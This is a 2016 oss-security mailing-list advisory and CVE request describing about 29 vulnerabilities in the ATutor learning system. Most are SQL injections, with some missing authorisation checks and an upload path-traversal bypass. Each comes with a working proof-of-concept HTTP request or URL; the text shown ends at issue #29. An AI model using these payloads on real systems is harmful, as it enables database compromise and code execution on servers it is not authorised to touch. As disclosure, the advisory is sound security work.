oss-security - CVE requests / Advisory: ATutor <= 2.2.1

Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 2 Jul 2016 09:42:51 +1200
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: CVE requests / Advisory: ATutor <= 2.2.1

Affected software: ATutor
Website: http://www.atutor.ca/
Affected versions: up to and including 2.2.1
Fixed version: 2.2.2
Bug entry: http://www.atutor.ca/atutor/mantis/view.php?id=5681
Changelog: http://www.atutor.ca/atutor/mantis/changelog_page.php?version_id=55
Reported by: Matthew Daley

I'd like to request CVE IDs for these issues. This is the first such
request; this message serves as an advisory as well.
Note: there may already be a CVE assigned for issue #32 as it seems multiple
researchers have reported this issue in various forms over a period of time.


------------------------------------------------------------------------------
Issue #1: Assignment dropbox file deletion SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability in deleting files from an assignment
dropbox. The "files" POST parameter, while being escaped before interpolation
into a SQL query that performs the deletion, is not interpolated in a context
where the escaping is suitable. Namely, the parameter is interpolated in the
context of a "IN (...)" SQL clause but escaped as if it were to be
interpolated in the context of the content of a string literal.  Hence, it is
possible to break out and inject arbitrary SQL.

Issue code location: mods/_standard/assignment_dropbox/index.php:96

Exploitable by: Instructors and students

POC HTTP request:
| POST /atutor/mods/_standard/assignment_dropbox/index.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=algqninh9noabfut1pcu2ov2f1
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 36
|
| owner_id=1&delete=x&files[]=SLEEP(5)


------------------------------------------------------------------------------
Issue #2: BasicLTI module form handling SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability in the BasicLTI module's handling of
forms through the at_form_validate and at_get_field_value functions. Form
definition fields that have "radio" or "integer" type are insufficiently
validated by at_form_validate; as long as the form value contains at least one
digit, the validation check will pass. In addition, at_get_field_value does
not escape values of this type; hence, when the value is interpolated in the
generated SQL query by at_form_insert or at_form_update, it is possible to
break out and inject arbitary SQL. This can be exploited, for example, when
modifying a BasicLTI tool's settings by an instructor.

Issue code locations:
| mods/_standard/basiclti/lib/at_form_util.php:155
| mods/_standard/basiclti/lib/at_form_util.php:209

Exploitable by: Administrators and instructors

POC HTTP request:
| POST /atutor/mods/_standard/basiclti/tool/instructor_edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=emk8ecv3uj23vthe9lf48b9p97
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 307
|
| form_basiclti=true&id=43&title=x&toolid=124&description=x&toolurl=http%3a%2f%2fexample.com&resourcekey=x&password=x&preferheight=0&allowpreferheight=SLEEP(5)&launchinpopup=0&debuglaunch=0&sendname=0&sendemailaddr=0&acceptgrades=0&allowroster=0&allowsetting=0&allowcustomparameters=0&customparameters=%0d


------------------------------------------------------------------------------
Issue #3: Blog post email SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability in sending notification emails after a
new blog post is added. When the subscription::send_mail method is called to
send this email, the value of the "oid" POST parameter from the post add
request is passed as the $entity_id argument. The method interpolates this
argument directly into a SQL query without escaping, allowing the query to be
broken out of.

Issue code location: include/classes/subscribe.class.php:110

Exploitable by: Administrators, instructors, students, and public users

POC HTTP request:
| POST /atutor/mods/_standard/blogs/add_post.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=u38hhspaedvh2lsbpdb74f0gp4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 78
|
| ot=1&oid=2'+UNION+ALL+SELECT+SLEEP(5),+NULL--+&title=ttt&body=qwww&submit=Post


------------------------------------------------------------------------------
Issue #4: Blog (un-)subscription SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when users subscribe or unsubscribe to
blogs. The "group_id" GET parameter from the subscription/unsubscription
request is interpolated into subscribe/unsubscribe SQL queries without
escaping, allowing the queries to be broken out of.

Issue code locations:
| include/classes/subscribe.class.php:83
| include/classes/subscribe.class.php:91

Exploitable by: Administrators, instructors, students, and public users

POC URL: http://atutor-test/atutor/mods/_standard/blogs/index.php?group_id=2'%2bSLEEP(5)%2b'&subscribe=set


------------------------------------------------------------------------------
Issue #5: Group course email SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when course emails that are sent to
specific groups. The "groups" POST parameter from the course email request,
while being escaped before interpolation into a SQL query that performs the
group membership lookup, is not interpolated in a context where the escaping
is suitable. Namely, the parameter is interpolated in the context of a "IN
(...)" SQL clause but escaped as if it were to be interpolated in the context
of the content of a string literal. Hence, it is possible to break out and
inject arbitrary SQL.

Issue code location: mods/_standard/course_email/course_email.php:84

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_standard/course_email/course_email.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=t5134h5mv6bm6b0us2frf725g4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 46
|
| subject=x&body=x&submit=Send&groups[]=SLEEP(5)


------------------------------------------------------------------------------
Issue #6: Course alumni SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when marking users as alumni of
courses. The user IDs provided in the "id" POST parameter from the course
alumni update request are not sanitised before interpolation into an alumni
update SQL query, allowing the query to be broken out of.

Issue code location: mods/_core/enrolment/html/enroll_edit.inc.php:221

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/enrolment/enroll_edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=pa7mfp2ll0usbtu3qqpkh6ghn3
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 40
|
| id[]=SLEEP(5)&func=alumni&submit_yes=Yes


------------------------------------------------------------------------------
Issue #7: Course enrolment SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when enrolling users in courses. The
user IDs provided in the "id" POST parameter from the course enrolment
request are not sanitised before interpolation into an enrolment update SQL
query, allowing the query to be broken out of.

Issue code location: mods/_core/enrolment/html/enroll_edit.inc.php:135

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/enrolment/enroll_edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=lh3701emiu0jm1glfalrdnm1a4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 40
|
| id[]=SLEEP(5)&func=enroll&submit_yes=Yes


------------------------------------------------------------------------------
Issue #8: Group membership removal SQL injection
------------------------------------------------------------------------------
There is a SQL injection when removing users from a group. The user IDs
provided in the "id" POST parameter from the user removal request, while being
escaped before interpolation into a SQL query that performs the group
membership modification, are not interpolated in a context where the escaping
is suitable. Namely, the parameters are interpolated in the context of a "IN
(...)" SQL clause but escaped as if they were to be interpolated in the
context of the content of a string literal. Hence, it is possible to break out
and inject arbitrary SQL.

Issue code location: mods/_core/enrolment/html/enroll_edit.inc.php:202

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/enrolment/enroll_edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=lh3701emiu0jm1glfalrdnm1a4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 46
|
| id[]=SLEEP(5)&func=group_remove&submit_yes=Yes


------------------------------------------------------------------------------
Issue #9: Course unenrolment SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when unenrolling users from courses.
The user IDs provided in the "id" POST parameter from the course unenrolment
request, while being escaped before interpolation into a SQL query that
performs the unenrolment, are not interpolated in a context where the escaping
is suitable. Namely, the parameters are interpolated in the context of a "IN
(...)" SQL clause but escaped as if they were to be interpolated in the
context of the content of a string literal. Hence, it is possible to break out
and inject arbitrary SQL.

Issue code location:
| mods/_core/enrolment/html/enroll_edit.inc.php:67
| mods/_core/enrolment/html/enroll_edit.inc.php:71
| mods/_core/enrolment/html/enroll_edit.inc.php:97
| mods/_core/enrolment/html/enroll_edit.inc.php:113

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/enrolment/enroll_edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=lh3701emiu0jm1glfalrdnm1a4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 42
|
| id[]=SLEEP(5)&func=unenroll&submit_yes=Yes


------------------------------------------------------------------------------
Issue #10: MySQLi addslashes override multiple SQL injection
------------------------------------------------------------------------------
The addslashes function, normally provided by PHP's standard library, is
globally overriden by ATutor depending on whether or not magic quotes are
enabled and whether or not MySQLi is enabled. If magic quotes are disabled and
MySQLi is enabled (the default PHP setup), addslashes is overridden to perform
no operation, where it simply returns its input string argument unchanged.
This causes several SQL injections in queries that attempt to use addslashes
to escape user-controlled data before interpolation into SQL queries.

Issue code location: include/lib/mysql_connect.inc.php:100

At least the following locations are vulnerable due to this problem:

| --------------------------------------------------------------------------
| Issue #10A: Course enrolment list search SQL injection (with MySQLi
|             enabled)
| --------------------------------------------------------------------------
| The addslashes override leads to a SQL injection vulnerability when
| searching course enrolment lists. The "search" GET parameter from the
| search request is passed to the addslashes function before interpolation
| into a search query. addslashes is effectively disabled in the
| aforementioned case where MySQLi is enabled, allowing the query to be
| broken out of.
|
| Issue code location: mods/_core/enrolment/html/enrolment.inc.php:157
|
| Exploitable by: Instructors
|
| POC URL: http://atutor-test/atutor/mods/_core/enrolment/index.php?tab=0&course_id=1&search=')))%09UNION%09ALL%09SELECT%09SLEEP(5)--%01&match=all&filter=Filter
|
|
| --------------------------------------------------------------------------
| Issue #10B: Glossary term addition SQL injection (with MySQLi enabled)
| --------------------------------------------------------------------------
| The addslashes override leads to a SQL injection vulnerability when adding
| terms to the glossary. The values of the "definition" POST parameter from
| the term addition request are passed to the addslashes function before
| interpolation into a term insertion SQL query. addslashes is effectively
| disabled in the aforementioned case where MySQLi is enabled, allowing the
| query to be broken out of.
|
| Issue code location: mods/_core/glossary/tools/add.php:67
|
| Exploitable by: Instructors
|
| POC HTTP request:
|     POST /atutor/mods/_core/glossary/tools/add.php HTTP/1.1
|     Host: atutor-test
|     Cookie: ATutorID=1nkfs6fc6li9aljm3mkmnjosr1
|     Connection: keep-alive
|     Content-Type: application/x-www-form-urlencoded
|     Content-Length: 202
|
|     num_terms=1&word%5B0%5D=RANDTOKEN&definition%5B0%5D=%27%2C+NULL%29%2C+%28NULL%2C+1%2C+%28SLEEP(5)%29%2C+%27&related_term%5B0%5D=0&submit=Save
|
|
| --------------------------------------------------------------------------
| Issue #10C: Social group member search SQL injection (with MySQLi enabled)
| --------------------------------------------------------------------------
| The addslashes override leads to a SQL injection vulnerability when
| searching for members in social groups. In the SocialGroup::searchMembers
| method, the $name argument is passed to the addslashes function before
| being interpolated into a search query. addslashes is effectively disabled
| in the aforementioned case where MySQLi is enabled, allowing the query to
| be broken out of.
|
| Issue code location: mods/_standard/social/lib/classes/SocialGroups/
|                          SocialGroup.class.php:468
|
| Exploitable by: Administrators, instructors, students and public users (no
|                 public course required)
|
| POC URL: http://atutor-test/atutor/mods/_standard/social/groups/list.php?id=123&q=')%09UNION%09ALL%09SELECT%09SLEEP(5),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%01
|
|
| --------------------------------------------------------------------------
| Issue #10D: Social friend search SQL injection (with MySQLi enabled)
| --------------------------------------------------------------------------
| The addslashes override leads to a SQL injection vulnerability when
| searching a user's social friends. In the searchFriends function, the
| $name argument is passed to the addslashes function before being
| interpolated into a search query. addslashes is effectively disabled in
| the aforementioned case where MySQLi is enabled, allowing the query to be
| broken out of.
|
| Issue code locations:
|     mods/_standard/social/lib/friends.inc.php:281
|     mods/_standard/social/lib/friends.inc.php:284
|
| Exploitable by: Administrators, instructors, students and public users (no
|                 public course required)
|
| POC URLs:
|     http://atutor-test/atutor/mods/_standard/social/index_public.php?q=')%09UNION%09ALL%09SELECT%09SLEEP(5),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%01
|     http://atutor-test/atutor/mods/_standard/social/connections.php?q=%27)%09OR%09first_name=SLEEP(5)--%01
(not exploitable by public users)
|
|
| --------------------------------------------------------------------------
| Issue #10E: Social group search SQL injection (with MySQLi enabled)
| --------------------------------------------------------------------------
| The addslashes override leads to a SQL injection vulnerability when
| searching social groups. In the SocialGroups::search method, the $query
| argument is passed to the addslashes function before being interpolated
| into a search query. addslashes is effectively disabled in the
| aforementioned case where MySQLi is enabled, allowing the query to be
| broken out of.
|
| Issue code locations:
|     mods/_standard/social/lib/classes/SocialGroups/
|         SocialGroups.class.php:214
|     mods/_standard/social/lib/classes/SocialGroups/
|         SocialGroups.class.php:215
|
| Exploitable by: Administrators, instructors and students
|
| POC URL: http://atutor-test/atutor/mods/_standard/social/groups/search.php?q=%27%09AND%09SLEEP(5)--%01


------------------------------------------------------------------------------
Issue #11: File comment SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when users add comments to uploaded
files. The "comment" POST parameter in the comment addition request is
interpolated into a SQL query template before it used in a call to queryDB.
This means that printf-style format sequences will be interpreted as if they
came from the actual SQL query template, allowing the escaping performed on
the parameter to be bypassed by interpolating parts of the escaped comment
back into the query structure. For example, the string "39%4$c" can be
interpolated into the SQL query template through the "comment" POST parameter.
When the SQL query template is processed by the call to vsprintf in the
create_sql function, this will be interpreted as the string "39" followed by a
format sequence that formats the value of the 4th parameter to the call to
queryDB as the integer value of a character. In this case, the 4th parameter
is the value of the "comment" POST parameter again, and ASCII value 39 is a
single quotation mark ('). This means that the SQL string literal will be
broken out at this point, and anything after this string will be interpreted
as additional SQL query syntax.

Issue code location: mods/_standard/file_storage/comments.php:72

Exploitable by: Instructors, students and public users

POC HTTP request:
| POST /atutor/mods/_standard/file_storage/comments.php?ot=1&oid=1&id=1 HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=cdvfse97jevef972u07ksp88a5
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 135
|
| id=1&folder=0&comment=39%254$c),(NULL,1,1,NOW(),SLEEP(5))--%01&submit=Post


------------------------------------------------------------------------------
Issue #12: Gradebook test title SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when setting gradebook test titles. The
value of the "title" POST parameter from the title change request is not
escaped before interpolation into a test update SQL query, allowing the query
to be broken out of.

Issue code location: mods/_standard/gradebook/gradebook_edit_tests.php:55

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_standard/gradebook/gradebook_edit_tests.php?gradebook_test_id=1
HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=rmmem1odcl14a5hhkqre0dbbe0
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 178
|
| title=%27%2Ctitle%3D%28SLEEP(5)%29%2Ctype%3D%27External&selected_grade_scale_id=4&has_due_date=false&save=Save


------------------------------------------------------------------------------
Issue #13: Unassigned user group membership update SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability in the "assign unassigned" group
membership update functionality. The keys of the "groups" POST parameter array
from the assignment request are not escaped before interpolation into a group
membership insertion SQL query, allowing the query to be broken out of.

Issue code locations:
| mods/_core/groups/members.php:116
| mods/_core/groups/members.php:124

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/groups/members.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=kb0tpe389ki621hr8cs8iko3o4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 52
|
| id=1&assign=Assign+Unassigned&groups%5BSLEEP(5)%5D=0


------------------------------------------------------------------------------
Issue #14: Inbox/sent items message deletion SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when deleting messages from a user's
inbox or sent item folders. The value of the "ids" POST parameter from the
deletion request, while being escaped before interpolation into a SQL query
that performs the deletion, is not interpolated in a context where the
escaping is suitable. Namely, the parameter is interpolated in the context of
a "IN (...)" SQL clause but escaped as if it were to be interpolated in the
context of the content of a string literal. Hence, it is possible to break out
and inject arbitrary SQL.

Issue code locations:
| inbox/index.php:48
| inbox/sent_messages.php:42

Exploitable by: Administrators, instructors and students

POC HTTP request:
| POST /atutor/inbox/index.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=3ett149cjokimnrr4caie15fd5
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 27
|
| ids=SLEEP(5)&submit_yes=Yes


------------------------------------------------------------------------------
Issue #15: Sent messages moving SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when moving messages from a user's sent
items folder. The values of the "id" POST parameter array from the move
request, while being escaped before interpolation into a SQL query that
performs the moving, is not interpolated in a context where the escaping is
suitable. Namely, the parameter is interpolated in the context of a "IN (...)"
SQL clause but escaped as if it were to be interpolated in the context of the
content of a string literal. Hence, it is possible to break out and inject
arbitrary SQL.

Issue code location: inbox/sent_messages.php:59

Exploitable by: Administrators, instructors and students

POC HTTP request:
| POST /atutor/inbox/sent_messages.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=k1d32hmjmbp0k80irup2e2gji6
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 22
|
| id[]=SLEEP(5)&move=Yes


------------------------------------------------------------------------------
Issue #16: Links search SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when searching course links. The
"search" GET parameter from the search request is not escaped before
interpolation into a search query, allowing the query to be broken out of.

Issue code location: mods/_standard/links/index.php:109

Exploitable by: Administrators, instructors, students and public users

POC URL: http://atutor-test/atutor/mods/_standard/links/?search=%22))%20union%20select%20all%201,2,3,SLEEP(5),5,6,7,8,9,10,11,12,13,14--%01


------------------------------------------------------------------------------
Issue #17: Links sorting SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when sorting course links on the links
tool page. The "col" and "order" GET parameters from the listing request are
not escaped before interpolation into a link query as sort parameters,
allowing the query to be broken out of.

Issue code location: mods/_standard/links/tools/index.php:69

Exploitable by: Instructors

POC URL: http://atutor-test/atutor/mods/_standard/links/tools/index.php?col=%20&order=SLEEP(5)


------------------------------------------------------------------------------
Issue #18: Photo album search SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when searching photo albums. The
"search" POST parameter from the search request is not escaped before
interpolation into a search query, allowing the query to be broken out of.

Issue code location: mods/_standard/photos/include/classes/
|                      PhotoAlbum.class.php:633

Exploitable by: Administrators, instructors, students and public users (no
|             public course required)

POC HTTP request:
| POST /atutor/mods/_standard/photos/search.php HTTP/1.1
| Host: atutor-test
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 134
|
| pa_search=')%09UNION%09ALL%09SELECT%09NULL,NULL,SLEEP(5),NULL,NULL,NULL,NULL,NULL,NULL%09FROM%09AT_admins--%01


------------------------------------------------------------------------------
Issue #19: New poll SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when creating new polls. The POST
parameters for the new poll's choices (starting with "c" and followed by a
number) from the poll creation requqest are initially escaped (by the
addslashes function). If they then exceed 100 characters, they are truncated
to 100 characters. Finally, the resulting choices are interpolated into a poll
creation SQL query. The vulnerability lies in the fact that the truncation
occurs after the escaping. It is possible to have one choice truncated so that
it ends in a single backslash character, escaping the single quotation mark
that would normally end the choice string literal in the SQL query. This means
that the next choice's single quotation mark will actually end the string
literal, allowing the next choice value to inject arbitrary SQL into the
query.

Issue code location: mods/_standard/polls/tools/add.php:45

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_standard/polls/tools/add.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=iru2n1iqrbagv31pe4ffln3eb5
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 237
|
| add_poll=true&question=a&c1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'&c2=,0,SLEEP(5),0,0,0,0,0,0,0,0,0,0,0)--%01


------------------------------------------------------------------------------
Issue #20: Poll editing SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when editing existing polls. The POST
parameters for the poll's choices (starting with "c" and followed by a number)
from the edit request are not escaped before being interpolated into a poll
updating query, allowing the query to be broken out of.

Issue code location: mods/_standard/polls/tools/edit.php:49

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_standard/polls/tools/edit.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=ericd783bksknn6rpbbs694ga7
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 142
|
| edit_poll=true&poll_id=1&question=a&c1=',choice1%3dSLEEP(5),choice3%3d'&c2=x


------------------------------------------------------------------------------
Issue #21: Social application deletion SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when deleting social applications. The
"apps" POST parameter array from the deletion request, while being escaped
before interpolation into a SQL query that performs the removal, is not
interpolated in a context where the escaping is suitable. Namely, the
parameter is interpolated in the context of a "IN (...)" SQL clause but
escaped as if it were to be interpolated in the context of the content of a
string literal. Hence, it is possible to break out and inject arbitrary SQL.

Issue code location: mods/_standard/social/lib/classes/
|                      Applications.class.php:83

Exploitable by: Administrators, instructors, students and public users

POC HTTP request:
| POST /atutor/mods/_standard/social/admin/delete_applications.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=pu2bmb9n747rnr19jnv62ka6t2
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 24
|
| delete=1&apps[]=SLEEP(5)


------------------------------------------------------------------------------
Issue #22: Social profile editing SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when editing the "additional
information" fields of a user's social profile (namely "interests",
"associations", "awards", "expertise" and "others"). The parameters to the
call to Member::updateAdditionalInformation are not escaped before
interpolation into a social profile update query, allowing the query to be
broken out of.

Issue code locations:
| mods/_standard/social/lib/classes/Member.class.php:261
| mods/_standard/social/lib/classes/Member.class.php:264
| mods/_standard/social/lib/classes/Member.class.php:267
| mods/_standard/social/lib/classes/Member.class.php:270
| mods/_standard/social/lib/classes/Member.class.php:274

Exploitable by: Administrators, instructors and students

POC HTTP request:
| POST /atutor/mods/_standard/social/edit_profile.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=ts1n8pp4rdepdq86etton7jql4
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 39
|
| interests=%27,associations=SLEEP(5),awards='&add=interests&submit=Save


------------------------------------------------------------------------------
Issue #23: Test question preview SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when previewing test questions. The
"qid" GET parameter from the preview request, while being escaped before
interpolation into a SQL query that performs the query, is not interpolated in
a context where the escaping is suitable. Namely, the parameter is
interpolated in the context of a "IN (...)" SQL clause but escaped as if it
were to be interpolated in the context of the content of a string literal.
Hence, it is possible to break out and inject arbitrary SQL.

Issue code location: mods/_standard/tests/preview_question.php:36

Exploitable by: Instructors

POC URL: http://atutor-test/atutor/mods/_standard/tests/preview_question.php?qid=0%29%20UNION%20ALL%20SELECT%20NULL,NULL,1,4,NULL,SLEEP(5),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%01


------------------------------------------------------------------------------
Issue #24: Test result listing SQL injection
------------------------------------------------------------------------------
There is a SQL injection vulnerability when listing a test's results. The
"start_date" and "end_date" POST parameters from the listing request are not
fully validated nor escaped before interpolation into a search query, allowing
the query to be broken out of.

Issue code locations:
| mods/_standard/tests/results_all.php:189
| mods/_standard/tests/results_all.php:190

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_standard/tests/results_all.php?tid=1 HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=nujdavomkp7mft095liogvfrv1
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 104
|
| start_date=2000-01-01%27+AND+SLEEP(5)+AND+%27%27%3D%27&end_date=&user_type=0&filter=Filter&test_id=1


------------------------------------------------------------------------------
Issue #25: Content menu inline title editing missing authorisation check
------------------------------------------------------------------------------
Course instructors are allowed to edit the titles of content items directly
from the course's sidebar using the inline editing function.  However, there
is no authorisation check on the server-side portion of this functionality,
allowing any logged in user to edit the titles of any content (regardless of
course).

Issue code location: mods/_core/content/menu_inline_editor_submit.php

Exploitable by: Students

POC HTTP request:
| POST /atutor/mods/_core/content/menu_inline_editor_submit.php HTTP/1.1
| Host: atutor-test
| Content-Type: application/x-www-form-urlencoded
| X-Requested-With: XMLHttpRequest
| Cookie: ATutorID=4c0hnc11npfvi7opgujsohora6
| Content-Length: 23
| Connection: keep-alive
|
| field=-1&value=Modified


------------------------------------------------------------------------------
Issue #26: Course file upload path traversal and extension check bypass
------------------------------------------------------------------------------
Instructors can upload files to a course's file collection. The extension of
this file is checked to make sure it does not match a blacklisted extension
(i.e., ".php"). However, this check can be bypassed by the fact that after the
blacklist check is passed, certain blacklisted characters are removed from the
filename. Hence, if one of these characters was inserted into an extension
that would otherwise be blacklisted, this will allow the adjusted extension to
bypass the initial blacklist check before being modified into the original
blacklisted extension. In addition, the "pathext" POST parameter from the file
upload request is used in the construction of the destination path for the
uploaded file. This parameter is not sanitised or escaped in any way, allowing
a simple path traversal. Combined, these two vulnerabilities allow instructors
to upload files with arbitrary extensions to arbitrary locations on the
server's filesystem.

Issue code locations:
| mods/_core/file_manager/upload.php:48
| mods/_core/file_manager/upload.php:81

Exploitable by: Instructors

POC HTTP request:
| POST /atutor/mods/_core/file_manager/upload.php?popup=0&framed=0&cp=&pid=&cid=0&a_type=0
HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=pr6iltsm3h1hfv9vkf4brrena4
| Connection: keep-alive
| Content-Type: multipart/form-data; boundary=--------1366665938
| Content-Length: 426
|
| ----------1366665938
| Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
| 10485760
| ----------1366665938
| Content-Disposition: form-data; name="uploadedfile"; filename="foo.ph,p"
| Content-Type: image/jpeg
|
| <?php phpinfo() ?>
| ----------1366665938
| Content-Disposition: form-data; name="submit"
|
| Upload
| ----------1366665938
| Content-Disposition: form-data; name="pathext"
|
| ../../www/foodir/
| ----------1366665938--


------------------------------------------------------------------------------
Issue #27: Session member ID SQL injection
------------------------------------------------------------------------------
Users can login to ATutor using auto-login functionality. In this case, the
user's numeric member ID and associated auto-login code are provided in a
request to the login handler in order to perform the auto-login. However, the
member ID is not sanitised before it is stored in the user's session data if
the login succeeds. Since the member ID is forced to be treated as an integer
in the login check SQL query, it is possible to perform an auto-login with a
given member ID number, but then have arbitrary content also stored in the
user's session member ID. Through this arbitrary content, it is possible to
then go on and perform SQL injections in future queries that interpolate the
user's session member ID without proper escaping.

Issue code locations:
| Part 1: confirm.php:154
| Part 2 (example): mods/_standard/forums/module_news.php:26 (example SQL
|                   query that then uses session member ID without escaping)

Exploitable by: Users

POC URL: http://atutor-test/atutor/confirm.php?auto_login=1&member_id=4%27+INJECTION&code=f38415fa37


------------------------------------------------------------------------------
Issue #28: Gradebook grade editing SQL injection
------------------------------------------------------------------------------
When a grade in a gradebook is edited, the raw grade percentage value is
converted into the final grade depending on the grade scale associated with
the test. This converted value is then interpolated into a SQL query that
updates the grade. However, this converted grade is not escaped before
interpolation into the query; thus, it is possible to break out of the query
by assigning a raw percentage grade that leads to a converted grade with
quotation marks in it. For example, it is possible to create a test with a
grade scale that maps raw percentage grades from 0% to 100% (all possible
values) to the grade "' || SLEEP(5) || '". When a grade is then set in the
test to any percentage value (or the grade "' || SLEEP(5) || '" itself), the
query will be injected into with the mapped grade value.

Issue code location: mods/_standard/gradebook/edit_marks.php:43

Exploitable by: Instructors

POC HTTP requests:
| Part 1:
|     POST /atutor/mods/_standard/gradebook/grade_scale_edit.php?grade_scale_id=4
HTTP/1.1
|     Host: atutor-test
|     Cookie: ATutorID=er9q94j4gp1itvv7tpca84uel3
|     Connection: keep-alive
|     Content-Type: application/x-www-form-urlencoded
|     Content-Length: 777
|
|     grade_scale_id=4&action=edit&selected_grade_scale_id=0&scale_name=x&scale_value%5B0%5D=%27+%7C%7C+SLEEP%285%29+%7C%7C+%27&percentage_from%5B0%5D=0&percentage_to%5B0%5D=100&scale_value%5B1%5D=&percentage_from%5B1%5D=&percentage_to%5B1%5D=&scale_value%5B2%5D=&percentage_from%5B2%5D=&percentage_to%5B2%5D=&scale_value%5B3%5D=&percentage_from%5B3%5D=&percentage_to%5B3%5D=&scale_value%5B4%5D=&percentage_from%5B4%5D=&percentage_to%5B4%5D=&scale_value%5B5%5D=&percentage_from%5B5%5D=&percentage_to%5B5%5D=&scale_value%5B6%5D=&percentage_from%5B6%5D=&percentage_to%5B6%5D=&scale_value%5B7%5D=&percentage_from%5B7%5D=&percentage_to%5B7%5D=&scale_value%5B8%5D=&percentage_from%5B8%5D=&percentage_to%5B8%5D=&scale_value%5B9%5D=&percentage_from%5B9%5D=&percentage_to%5B9%5D=&submit=Save
| Part 2: http://atutor-test/atutor/mods/_standard/gradebook/edit_marks.php?filter=&gradebook_test_id=&member_id=&p=1&save=Save&grade_3_4=0%25&grade_3_2=


------------------------------------------------------------------------------
Issue #29: Social application deletion missing authorisation check
------------------------------------------------------------------------------
Administrators are able to delete existing social applications.  However, no
authorisation check is performed on this operation, allowing any user to
perform similar social application deletions.

Issue code location: mods/_standard/social/admin/delete_applications.php

